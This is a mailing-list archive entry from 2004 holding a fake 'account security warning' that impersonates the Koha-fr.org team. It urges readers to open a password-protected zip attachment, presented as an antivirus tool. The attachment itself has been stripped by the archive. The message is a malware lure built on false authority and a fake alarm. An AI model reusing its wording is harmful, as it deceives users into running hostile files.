[Annonces] E-mail account security warning.

annonces at koha-fr.org annonces at koha-fr.org
Mer 3 Mar 21:05:08 CET 2004

Dear  user of "Koha-fr.org"  mailing system,

Our  antivirus software  has detected a  large ammount  of viruses  outgoing  
from your email  account, you may use  our free anti-virus  tool to clean  up
your computer software.

Please, read  the  attach  for further  details.

For  security reasons attached  file is  password  protected. The password is  "31784".

The Management,
   The Koha-fr.org team                              http://www.koha-fr.org
-------------- section suivante --------------
Une pièce jointe non texte a été nettoyée...
Nom: Attach.zip
Type: application/octet-stream
Taille: 12424 octets
Desc: non disponible
Url: http://ob.paulpoulain.com/pipermail/annonces/attachments/20040303/4989919f/Attach.obj

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